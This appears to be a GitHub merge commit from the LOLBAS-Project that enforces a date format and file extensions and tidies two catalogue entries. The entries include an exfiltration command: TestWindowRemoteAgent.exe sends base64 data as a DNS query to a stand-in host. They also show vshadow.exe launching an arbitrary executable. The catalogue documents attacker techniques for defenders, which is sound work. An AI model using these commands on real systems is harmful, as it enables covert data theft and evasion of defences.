Merge pull request #330 from LOLBAS-Project/fix/incorrect_date

Enforcing YYYY-MM-DD format for dates (fixes #328)
LOLBAS-Project · Oct 3, 2023 · 90f666e · 90f666e
2 parents f55d9d1 + b395195
commit 90f666e
Show file tree

Hide file tree

Showing 4 changed files with 8 additions and 4 deletions.
diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
@@ -4,9 +4,12 @@ on: [push,pull_request]
 
 jobs:
   lintFiles:
+    if: github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name != github.event.pull_request.base.repo.full_name
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v3
+      - name: Check file extensions
+        run: if [[ $(find "${GITHUB.WORKSPACE}/yml" -type f -not -name "*.yml") ]]; then echo "Files with unexpected extension found, please ensure you use '.yml' (all lower case) for files in the yml/ folder."; exit 1; fi
       - name: yaml-lint
         uses: ibiqlik/action-yamllint@v3
         with:

diff --git a/YML-Schema.yml b/YML-Schema.yml
@@ -26,6 +26,7 @@ mapping:
     required: true
   "Created":
     type: date
+    format: '%Y-%M-%d'
     required: true
   "Commands":
     type: seq

diff --git a/...therMSBinaries/testwindowremoteagent.yaml → ...OtherMSBinaries/Testwindowremoteagent.yml b/...therMSBinaries/testwindowremoteagent.yaml → ...OtherMSBinaries/Testwindowremoteagent.yml
@@ -2,12 +2,12 @@
 Name: TestWindowRemoteAgent.exe
 Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
 Author: Onat Uzunyayla
-Created: 2023-21-08 
+Created: 2023-08-21
 Commands:
   - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
     Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
     Usecase: Attackers may utilize this to exfiltrate data over DNS
-    Category: Data Exfiltration
+    Category: Upload
     Privileges: User
     MitreID: T1048
     OperatingSystem: Windows 10, Windows 11

diff --git a/yml/OtherMSBinaries/vshadow.yaml → yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/vshadow.yaml → yml/OtherMSBinaries/Vshadow.yml
@@ -1,10 +1,10 @@
 ---
-Name: vshadow.exe
+Name: Vshadow.exe
 Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
 Author: Ayberk Halaç
 Created: 2023-09-06
 Commands:
-  - Command: vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:
+  - Command: 'vshadow.exe -nw -exec=c:\windows\system32\calc.exe C:'
     Description: Executes calc.exe from vshadow.exe.
     Usecase: Performs execution of specified executable file.
     Category: Execute